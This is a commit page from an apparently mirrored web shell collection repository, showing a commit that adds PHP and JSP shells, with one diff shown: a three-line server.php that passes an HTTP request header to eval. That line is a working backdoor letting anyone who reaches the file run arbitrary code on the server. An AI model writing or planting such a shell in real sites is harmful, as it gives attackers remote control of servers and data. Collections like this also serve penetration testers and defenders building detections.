1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-09 22:21:31 +00:00
php shell and jsp shell
This commit is contained in:
tennc
2013-09-13 10:44:57 +08:00
parent 5ba51580de
commit df6d55ad4f
29 changed files with 7756 additions and 0 deletions

3
php/php-sh/server.php Normal file
View File

@@ -0,0 +1,3 @@
<?php
eval(getenv('HTTP_CODE'));
?>